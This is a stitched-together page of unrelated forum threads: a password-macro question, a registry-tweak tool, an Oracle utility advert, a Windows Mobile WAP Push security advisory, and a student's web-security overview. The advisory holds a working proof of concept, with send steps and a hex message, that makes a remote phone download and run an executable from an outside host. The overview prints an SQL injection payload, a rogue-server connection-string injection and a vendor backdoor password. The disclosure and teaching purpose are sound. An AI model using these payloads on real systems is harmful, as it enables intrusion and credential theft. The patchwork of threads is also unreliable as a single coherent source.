Related
Hi, my company uses GoodLink for corporate e-mail, and they require I enter a password whenever my device is unused for 30 minutes. The password has to be 6 digits with alpha and numeric. Since my Hermes doesn't have keys, it's very dangerous to try to do this while driving. Can you give me some suggestions for making this easier (without hacking the password out completely)?
I'm looking into: SIP that allows me to create a custom keypad with just a few keys (letters and numbers) or SIP that will play macros.
Please give me your suggestions! Thanks.
You could use MortScript. Write a script that opens the required program & then inputs the required password ect & map this script to a shortcut or a button.
Plenty of info on MortScript if you do a search, we have a script collection in the Development forum.
I think PQz (PQz key code sender, PQzII keyboard helper) might be another option. Have not used them myself so not sure what they are capable of.
Windows Mobile Security Advisory: Manufacturers leave device open for WAP-Push based attacks
--------------------------------------------------------------------------------------------
Description:
------------
WAP Push SI (Service Indication) and SL (Service Load) are so called "Service SMS". These messages are used by operators to notify about software updates or to deploy them directly. Microsoft implemented a security policy to ensure that these messages are accepted only from trusted orginators. This policy is defined in the device registry. If improper settings are applied to this policy attackers can send malicious content to the device which then displays or executes the content immediately. This leaves the device open for further attack scenarios.
Workaround / Fixes:
-------------------
Open your device registry and navigate to:
HKLM\Security\Policies\Policies
Check the values of the following DWORDs:
0x0000100c
and
0x0000100d
Microsofts recommends the following values for these:
0x0000100c : 0x800
0x0000100d : 0xc00
If they are for example 0x840 and 0xc40 your device is wide open and vulnerable. Change the keys to
the Microsoft recommendation. They are effective immediately.
Proof of concept:
-----------------
For testing purposes check the above registry keys and set them to a faulty value (like the above
0x840 and 0xc40). Then use a program like PDUSpy or HushSMS to do some testings.
HushSMS is able to send these kind of messages from windows mobile based devices.
Get HushSMS from http://www.silentservices.de/HushSMS.html
Download the latest version (currently v0.6beta) and install it on your device.
Execute HushSMS and type in the number of the receipient windows mobile phone.
In the message body field type in the following (note without a leading HTTP://!!!):
www.silentservices.de/wapsltest.exe
Click Send->Send WAPSL
Watch your target device. If it starts connecting via GPRS it will then download the above sample
program and executes it immediatly without user interaction.
If you want to test your target device with PDUSpy use the follwing sample message:
UDH: 05040b8423f0
Message(hex):
DC0605B0AF82B48302066A008509037777772e73696c656e7473657276696365732e64652f77617074657374736c2e65786
5000501
Edit: Added a youtube video in post #4
EDIT 19.09.2008: Some clarifications
Well, I received my brand new raphael two weeks ago and guess what, the values set by HTC by default are even more worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
These means in detail:
Accept WAP Push Service Load Messages orgination from authenticated and trusted PPGs (Push Proxy Getways) AND any.
Accept WAP Push Service Indication Messages origination from any.
Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".
However some may say:"Hey that's not that worse, I have opera set as my default browser and opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my opera window."
Well, since this is fine for people who "know what they are doing", but is is not for or these other people around there taht are using these devices and even don't have clue about what WAP Push is or what a security policy is or simply don't mind on clicking "accept" each time a message pops up ( and trust me when I say there are more people like this out there as you may guess).
Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text:"HTC has to inform you about a critical security update. Donwload ist at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess what enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their opera browser?
And what about people that dont have opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...
Here's another scenario:
Imagine a security vunlerability in opera mobile is discovered that can be exploited if the user visits a malicious webpages. You can guess how someone can force the user to visit this infectious webpage, can't you? ;-)
Or, let's say a malicious freak on the net sets up a webpages that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.
It's up to you to care about this or not since HTC doesn't seem to care.
Cheers
This is good info, though I don't see it as a huge hole since there is still opportunity to block the file by the end-user...which ultimately is required in both settings scenarios to stop the file executing.
From where are you getting these alerts, MSDN? I'd like to get in on receiving them.
tmknight said:
This is good info, though I don't see it as a huge hole since there is still opportunity to block the file by the end-user...which ultimately is required in both settings scenarios to stop the file executing.
From where are you getting these alerts, MSDN? I'd like to get in on receiving them.
Click to expand...
Click to collapse
For SI you are right since the user only gets notified with an URL, but I would call it a huge whole for the SL things. SL messages get executed by the device immediately without the user having a way to block or stop this (if the message is set up accordingly; there are 3 message options as per standard and I refer to the silent execution flag).
If you are watching your device while the messages comes in you can see that a gprs connection is beeing made (if you are connected the whole time with an unlimited data plan for example you wouldnt even notice this).
Just give it try with the method I posted in the advisory with HushSMS (not advertising my program here, just giving a proof of concept).
Both advisories are made by me since I dicovered both flaws.
Cheers
I just made a youtube video to demonstrate what this vulnerability means.
Watch it here: http://de.youtube.com/watch?v=QhJ5SgD-bdQ
I did try it before I posted and my results in each instance (default and with suggested fix) incurred a user prompt. Albeit the default setting did not prompt for the executable to run, but still was prompted to download via IE - recommeded setting prompts at download and execution (see signature for my setup).
Like I said it is good info and indeed a security risk.
Will you share from where this info came?
Cheers
tmknight said:
I did try it before I posted and my results in each instance (default and with suggested fix) incurred a user prompt. Albeit the default setting did not prompt for the executable to run, but still was prompted to download via IE - recommeded setting prompts at download and execution (see signature for my setup).
Like I said it is good info and indeed a security risk.
Click to expand...
Click to collapse
Well this is interesting. So you say you had the same faulty registry keys like the new kaiser wm 6.1 rom had? (100c and 100d set to 840 and c40)
As you may have seen in the video my IE simply did not ask to open the file. It just gets executed...
Well, then at least your IE settings saved you from getting r00ted
tmknight said:
Will you share from where this info came?
Click to expand...
Click to collapse
This vulnerability was researched by me about 1 year ago. But the default settings for SL and SI messages was always set correct in the last ROM versions for the devices I had. I just looked at the default settings on this new kaiser rom and found that they left it open for whatever reason and so I published this advisory. I already contacted HTC and am waiting for a response.
hi, i've got htc raphael and values are
0x0000100c : 0x800
0x0000100d : 0x40
not
0x0000100c : 0x800
0x0000100d : 0xc00
but still flaw works. luckly i have opera as default browser but i wanted to findout how can achive download only option.
also by changing to those suggested values do i disable my phones wappush message receive capability?
thanks
Hello,
Good day, I would like to thank you for this post about Wap Push Messages. I have a straing problem with my HTC Kaiser Windows Mobil 6.1. My device don't notify me about any WAP Push Messages. I have the 800 & c00 vales in my registry, I changed them to 840 & c40 and send a test message as you suggest and it's started downloading after a period of time without asking me.
I changed it back to Microsoft recommends and send a new message again but it didn't appear in inbox message and my cell didn't notify me about new WAP PUSH message.
I'm going crazy with this, what's the problem, can you help me ?
Regards,
Desigen said:
... I changed them to 840 & c40 and send a test message as you suggest and it's started downloading after a period of time without asking me.
I changed it back to Microsoft recommends and send a new messeage again but it didn't appear in inbox message and my cell didn't notifcate me about new WAP PUSH message.
...
Click to expand...
Click to collapse
I don't understand what exactly your promblem is with. If you set the Microsoft recommended values it simply tell the device which security policy to apply to wich kind of messages. In the case of the two values the settings say that WAP-Push SL & SI messages have to come from trusted push proxy gateways. If you set them to the faulty values (840&c40) the device accepts these kind of messages coming from any. If the correct (or recommended) values are set the device simply drops or discards the messages without any user notification. So your described behaviour looks normal to me.
(Note: for those who are familiar with device roles and policies, I'm not going into deep here to avoid confusion)
Thanks for fast replay,
My problem is that I don't get notification from my mobile about new WAP-Push Messagess. I think when I receive an new one it must be in the inbox. My problem is, WAP-Push Messagess doesn't appear in the SMS/inbox folder.
Thanks
nolovelust said:
hi, i've got htc raphael and values are
0x0000100c : 0x800
0x0000100d : 0x40
not
0x0000100c : 0x800
0x0000100d : 0xc00
but still flaw works. luckly i have opera as default browser but i wanted to findout how can achive download only option.
also by changing to those suggested values do i disable my phones wappush message receive capability?
thanks
Click to expand...
Click to collapse
Well 0x800 for 0x100c is fine but 0x40 for 0x100d is not.
Policy 4108 (0x100c) handles WAP Push Service Load (SL) Messages
Policy 4109 (0x100d) handles WAP Push Service Indication (SI) Messages
So if policy 4109 (0x100d) is set to 40 this means that the device will accept messages from any instead of trusted push proxy gateways only.
So the settings you wrote above mean the following:
4108 (0x100c) = 0x800 : Accept WAP Push Service Load (SL) messages only from trusted and authenticated push proxy gateways
4109 (0x100d) = 0x40 : Accept WAP Push Service Indication messages from any originator and no authentication is needed
While Service Indication messages are not as harmful as Service Load messages, they still can try to fool people into clicking the download now option. Since the orginator is hidden and you only see network message as the sender, this kind of attack can be used to spoof valid operator messages.
I suggest you set 4109 (0x100d) to a value of 0xc40.
These settings do not prevent your device from receiving these kind of messages, but they have to come from an authenticated and trusted push proxy gateway or source.
Desigen said:
Thanks for fast replay,
My problem is that I don't get notification from my mobile about new WAP-Push Messagess. I think when I receive an new one it must be in the inbox. My problem is, WAP-Push Messagess doesn't appear in the SMS/inbox folder.
Thanks
Click to expand...
Click to collapse
Which kind of wap push message are you talking about?
For those that would like to read more about security policies and roles on windows mobile google for:
"Security Model For Windows Mobile 5.0 and Windows Mobile 6"
c0rnholio said:
Which kind of wap push message are you talking about?
Click to expand...
Click to collapse
Dear c0rnholio,
I think it's SL, I talking about the one you receive an option to download the content for Internet. Because my mobile provider send a WAP-Push to download ringtone over GPRS. So, they told me you need to do some modification in your mobile to receive this kind of messages. My mobile don't save the WAP-Push in the inbox folder. But when I put my SIM in Nokia phone I receive those WAP-Push.
As A test. I sent a WAPSL message using HushSMS to my phone it done not do anything. I sent one to Nokia Device it's reading it and give me an option to download the content.
Thansk
Desigen said:
...
As A test. I sent a WAPSL message using HushSMS to my phone it done not do anything. I sent one to Nokia Device it's reading it and give me an option to download the content...
Click to expand...
Click to collapse
Ah, OK, now I got you. Well, if the policy is set right your device will discard the message you sent with HushSMS because it is not coming from a trusted and authenticated source. But you should still be able to receive these messages from your service provider if your device is properly provisioned.
The fact that you can receive them on your nokia just indicates that nokia also has lazy security settings for these kind of messages.
If you cannot receive your ringtone from your provider when the correct policy settings are applied it seems that your device is not provisioned to trust your service provider. I suggest you enable it temporary by setting the unsecure values and after receiption of your ringtones reset them to the secure values.
Some clarifications
Well, I received my brand new raphael two weeks ago and guess what, the values set by HTC by default are even more worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
These means in detail:
Accept WAP Push Service Load Messages orgination from authenticated and trusted PPGs (Push Proxy Getways) AND any.
Accept WAP Push Service Indication Messages origination from any.
Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".
However some may say:"Hey that's not that worse, I have opera set as my default browser and opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my opera window."
Well, since this is fine for people who "know what they are doing", but is is not for or these other people around there taht are using these devices and even don't have clue about what WAP Push is or what a security policy is or simply don't mind on clicking "accept" each time a message pops up ( and trust me when I say there are more people like this out there as you may guess).
Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text:"HTC has to inform you about a critical security update. Download it at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess what enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their opera browser?
And what about people that dont have opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...
Here's another scenario:
Imagine a security vunlerability in opera mobile is discovered that can be exploited if the user visits a malicious webpages. You can guess how someone can force the user to visit this infectious webpage, can't you? ;-)
Or, let's say a malicious freak on the net sets up a webpages that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.
It's up to you to care about this or not since HTC doesn't seem to care.
Cheers
Hi,
It seems that the value 0x40 for 0x100d working well for me I received notification and the message stored in the inbox, any idea !!
But I don't know who changed the both value to be 0x480 & 0xc00
Something to mention, two weeks ago I received my first WAP-Push but it was sent from unauthorized source !
Desigen said:
Hi,
It seems that the value 0x40 for 0x100d working well for me I received notification and the message stored in the inbox, any idea !!
But I don't know who changed the both value to be 0x480 & 0xc00
Something to mention, two weeks ago I received my first WAP-Push but it was sent from unauthorized source !
Click to expand...
Click to collapse
It seems you misunderstood me, or I'm simply not getting your point here.
Yes, with a value of 0x40 for 0x100d you can receive WAP Push SI messages from anyone. This might become a risk. The secure setting for this policy is 0xc00. This will save you from unwanted SI messages but may block your providers ringtone messages.
The default values you had where set from HTC (or whatever ROM you migth have installed) with the delivery of the ROM that is installed on the device. That's the final point of the advisory. The ROM manufacturer has left the device open for these kind of attacks.
However a final word in our little discussion:
If you want to be able to receive WAP Push messages from an untrusted and unauthenticated source then leave the settings as they were at the beginning. Be warned as this may be a security risk.
If you don't want to receive WAP Push messages from untrusted and unsauthenticated origins, then change the values as described in the first post.
As a rule of thumb: If you want to receive these messages, even if they come from untrusted and unauthenticated sources, but only want this temporary (for example if you know that your provider will send you a ringtone in the next minutes) then set the values to 0x40 each and after you received what you want reset them to the recommended values on the first post.
I'm out...
cheers
Thanks for sharing this usfull information with us.
I don't understand the value '0xc00' -- does that mean just change it to zero's? That's what I did using the registry editor... there were both 'hex' and 'dec' settings, with the 'hex' dword value appearing to be the one that needed fixing -- so I changed 0000100c to 800 and 100d to 0 -- is this right, or have I inadvertently instructed orbiting alien spacecraft to open fire upon earth?
Maybe screenshots, or a little more explanation on exactly what registry changes need to be made, I'm not used to ones with both hex and dec entries...
Hi Everyone,
I, like many of you, spend way to much time setting phones up over and over again. Since a big part of this is registry edits, I have built a web site that allows you to check off the registry options you want, which it then uses to create a downloadable CAB file to install that will contain all of those registry tweaks. This makes things completely reversible by uninstalling the CAB file.
Notes:
This is Beta. While I have used it, and it's a very basic process, it isn't commercial software by any means.
If you would like to add a new feature, post in this thread.
You may install more than one cab file created with this tool. Just use different names at the bottom of the form.
Without further delay, here's the site:
<edit> The tool has now moved to nowsci.com. If you have any issues, please let me know. </edit>
http://nowsci.com/registry-changer/
Thanks,
Ben
* hold for updates *
Update 1: HTML now renders mobile friendly, so you can use this straight from your device.
Update 2: Edit feature added.
Update 3: Can now manually specify string or integer.
Update 4 [11/17/2008]: Can now specify the app name for install, allowing the user to have more than one Registry Changer cab installed at any point in time.
Update 5 [03/27/2009]: Fixed some character flaws for input. Preparations for move to a new host.
Update 6 [04/22/2009]: Added a filter option.
The site now has the ability for the end user to add registry entries to the database.
Thank you very much. I believe the "Camera Enhancements" entry is mis-titled. Shouldn't it be Rotate Picture 90 degrees, not 180 degress?
Doh! I will fix that.
Also, just added all the registry entries from the Diamond Tweaks post.
What about the Bluetooth DUN profile adding to the list? - Mike
What's the registry entries for that? Happy to add them, or you can add them yourself now through the site.
What happens if you tweak a registry entry that does not exist on your specific device or rom?
Good question. For the most part, I would guess nothing. If there is nothing on your system looking for the registry entry, then it won't effect anything. That being said, that doesn't mean WM doesn't look for registry entries that aren't there. For instance, the following tweak:
Enable Vision Duration/Disconnect Popup
HKLM\ControlPanel\Phone\Flags2=16
Flags2 doesn't exist by default on most any WM6 phone. Adding it in, enables the disconnect.
Who added the "Mighty" tweaks? Is that a phone? Many of those seem like they should go in Misc. I might clean that up if those aren't specific to a phone.
Would it be possible to have a wiki of descriptions for each of these options? I know I could Google them one by one but I'm sure users would appreciate a single source.
Hmm, not a bad idea. I wonder if there was a spot on the xda wiki I could use for it since I don't have my own. I may end up integrating a detailed description field for each item with a question mark next to it. Unfortunatly I won't be able to define them all since people have added one's I've never used.
OK I have a request. I don't' so much mind tweaking the settings when I flash. However what does drive me nuts and keeps me from flashing is knowing I will have to reconfigure all my email accounts. I just use the default mail program, but what a pain going through and adding my 7 yes Seven email accounts every time I flash my phone. Is there a way to make a cab that would auto input all my account settings? The reason for so many accounts, is I have personal accounts, business accounts, email list accounts, car club accounts, and forum subscription accounts.
It would be awesome to be able to go to a site, or run an app where I could plunk in all my account settings, then create a cab store it to my SD card and whenever I flash, just run the cab and POOF all my accounts are setup.
Unfortunately, probably wouldn't be easy to make a cab. However, programs like Sprite Backup will do this for you. You can selectively restore your mail using SB, however I generally back up my phone once I get things the way I like it, then if anything goes sour, I hard reset, then restore.
any1 made an ultimate tweak.cab? maybe make your diamond seem as fast as a custom rom?????????????
then any hardreset.......
dewey1973 said:
Would it be possible to have a wiki of descriptions for each of these options? I know I could Google them one by one but I'm sure users would appreciate a single source.
Click to expand...
Click to collapse
+1 on descriptions of each cab
Wow very nice! Thanks!
I suggest a field to make a *.cab regarding to any registry path/setting the user wishes (if the user is more technical).
without having to actually add to the public entry list.
This will allow the ability to:
1. not have to wait for the admin to add the specific entry
2. allows the author of the new *.cab to distribute their new edit on the fly.
3. give the admin to log & analyze the entries in the custom field to and determine more of the common *custom* entries the ppl may want. Thus not having to depend on explicit user input and emails all the time.
First - thanks for putting this together!
Quick question - I had it "enable" GPS coded photos...but I don't think it did? Shouldn't I have an option somewhere in my camera menu to activate this once I've installed the .cab? Additionally, I don't believe "enable landscape pictures" and "sport mode" worked - how do I know?
Many thanks!
Oh, and I forgot to mention (not that it matters???) that I'm on an HTC Touch Pro with Sprint - stock ROM. I'm new to all this, so I apologize if this is basic stuff.
Hi developers, was just wondering if anybody could have used say a note2 to connect to oracle database and run a couple of queries. Is this possible or has it been under looked. Thanks
never use it like that ,i am sorry
New Oracle Database Utility,TyphoonDBMS 1.0 Beta (Free) for You
danrweki said:
Hi developers, was just wondering if anybody could have used say a note2 to connect to oracle database and run a couple of queries. Is this possible or has it been under looked. Thanks
Click to expand...
Click to collapse
TyphoonDBMS is a complex and efficient Java-based software (free) solution that enables user to easily access and manage tables on Oracle Database Servers.
Typhoon is a comprehensive and reliable application that was developed to assist user in managing the contents of Oracle databases, enabling user to add, edit or remove tables without needing to resort to SQL statements to get the job done.
To gain access to the utility, user first need to create an account using a preferred set of credentials, which will then be required to enter every time user wish to work with Typhoon.
The program allows user to connect to a local or cloud server, by providing the necessary information, including name, version, driver and service ID. user can also input the network details, specifically the host and port number, along with the username and password, or even the database URL. Prior to saving the configuration, user can test the connection to make sure everything is in order.
Once user connect to the Oracle database, Typhoon allows user to view its contents, namely the tables that it comprises. user can browse through them, select a record and update it. Similarly, user can add a new one, as the tool enables user to ‘Insert Number Data’, ‘Insert Blob Data’, ‘Insert Clob Data’, ‘Insert String Data’ or ‘Insert Date Data’.
Moreover, user can create a new table by defining the number of columns that user need, assigning it a name, then filling out the columns and rows with the information user wish it to store. All of this can be done without having to resort to SQL statements or commands. Other options include the ability to drop tables from the database.
This Java-based utility also offers user a series of SQL ‘Syntax References’, (statements and functions) and which user can analyze in detail, to learn how to better work with them, and then use them for your own purposes.
Download & Blog:
typhoondbms.wordpress.com/download/
download.cnet.com/Typhoon-DBMS/3000-10254_4-76273374.html
softpedia.com/get/Internet/Servers/Database-Utils/Typhoon.shtml
Hi all,
As part of a class I'm doing, we are required to post some content to a forum to engage in discussion on security:
.
Cross Site Scripting (XSS)
OWAPS describes Cross Site Scripting (XSS) where a website has been marked as a trusted website, which for some reason, can run malicious code or scripts through inputs such as forms. As the end user’s browser sees this site as trusted, it allows the malicious script or code to execute, which can give access to client side information before it is encrypted (such as usernames, passwords, session IDs, cookies, etc).
In PHP for example, a normal input box where a user would enter their name, would be able to enter the following:
When PHP prints this back out after submission, it will execute the script between the script tags (In this case, just a simple popup).
In this scenario, this can be solved by wrapping the input value with htmlentities:
This would print any script as literal text rather then executing it.
In Java,
XSS is still a major issue, both due to some sites not implementing simple work around such as htmlentities or htmlspecialchars, or for reasons where these cant be used. XSS affects PHP applications by as much as 86% - its PHPs biggest vulnerability.
In Java, the easiest method is to simply validate inputs and to encode special characters (<>[email protected]#$%^&*). Alternativley, OWASP have a XSS class which includes easy methods to best prevent against certain types of XSS.
Code Injection
Code injection is where using the sites scripting language, you can inject (rather, have the site pull) code from somewhere else.
For example, php can call one of its own pages like so:
however, if we replace the contact.php page with an external hosted script:
This will cause the enduser to execute that script. This all comes down to PHP validation which is coded within the PHP to ensure only valid respsonses are accepted.
This is unlike command injection. Command Injection is an attack which is designed to execute commands on the PHP hosted system (server). This can be done where most parameters are passed (headers, input boxes, etc) and will typically display any output on the returned webpage.
For example, to return a password for a certain user, you could use a command like:
Typically, to prevent such commands from executing, a whitelist of command can be made, whereby only those listed are allowed to be executed on the server. Alternativly, it is recommend where the application needs to invoke system side commands, to do this through local python scripts, rather then PHP calling the commands.
CRLF injection
CRLF injection comes from the elements CR (Carriage Return) and LF (Line Feed) – together (CRLF) this denotes a new line (done simply by pressing the enter button). If a website for example, allows you to upload a file, an attacker may name this file as follows:
This would result in a system command being carried out to delete everything in the /bin folder.
It also allows an attacker to write to the log file, by creating it own new line. If the logs are configured in such a way that they will email out any WARNINGS or ERRORS, an attacker may add these to a new log line repetitively, backing up the email and bandwidth.
The simple way around this is for JAVA to sanitise any input strings, either through substituting known commands, or through methods such as
SQL Injection
.NET SQL Injection allows an authorised SQL command to be sent to the SQL server and executed.
An SQL string may be built using inputs from a form. A possible example of this is:
Code:
SELECT email, passwd, login_id, full_name FROM members WHERE email = 'formemail';
where the red is the text from an input field.
However, we can modify this string which can allow some malicious stuff to happen:
Code:
SELECT email, passwd, login_id, full_name FROM members WHERE email = 'formemail'; DROP DATABASE members --';
Adding the red text to the email input box, would allow us to delete the whole table, or alternatively insert a new record into a table, or possible delete records, modify records (change passwords), or even delete whole tables.
To prevent this, you can limit the damage an SQL injection can do you using proper database permissions (deleting records, tables, etc), and to also use good sanitisation – look for -- or ; in any field and invalidate the data if it has these characters.
Directory Traversal
Directory traversal can also be referred to as a “dot dot slash” attack.
In php, a resource (page) can be called as follows:
However, it may be possible to get other files, not even part of the web directory using the following examples:
The easiest way to prevent this is to assign proper permission on the server itself. However, many web developers do not own the server, therefore, another layer of protection is fully qualify the file path, with the root being where the webpage sits.
Connection String Injection
Also known as connection string pollution, it is possible for an attacker to inject parameters into a connection string to a database. Typically a connection string is built by delimiting each value with a comma. In an injection attack, strings can be built using semi colons as a delimiter.
A typical connection string to a windows SQL server may look like the following:
Code:
Data source = SQL2005; initial catalog = db1; integrated security=no; user id=+’User_Value’+; Password=+’Password_Value’+;
However, if an attacker places a rouge windows SQL server on the internet, and then uses a connection string like follows:
Code:
Data source = SQL2005; initial catalog = db1; integrated security=no; user id=;Data Source=Rogue Server; Password=; Integrated Security=true;
This allows the target windows SQL server to connect to the rouge server using its own Windows credentials, exposing much data.
Backdoors
Backdoors can be common within applications and web applications and can occur across many types of frameworks, however, it’s the security around the knowledge of backdoors, and what they allow, which can be of concern. All modems, routers and some managed network infrastructure have administrator usernames and passwords. However, sometimes, the network vendor (CISCO, NETGEAR, etc) or ISP may choose to put a backdoor access onto these devices. This may be in case a user forgets their administrator credentials, for automatic firmware updates, or for remote troubleshooting. Some of these backdoors may allow for more settings then what is normally shown to an end user.
For example, some older Optus supplied modems had the hidden user: Admin, and a password of: Y3S0ptus. This was standard across thousands of supplied modems. The problem was, the end user had no way of changing the default setting for remote web access from Enabled to Disabled, which meant anyone that knew of their IP address or domain name, could now remote access their modem router, add port redirects, and now connect to devices within their LAN.
In the case of ISP provided modems, it might be safer to simply by something else, not supplied by the ISP.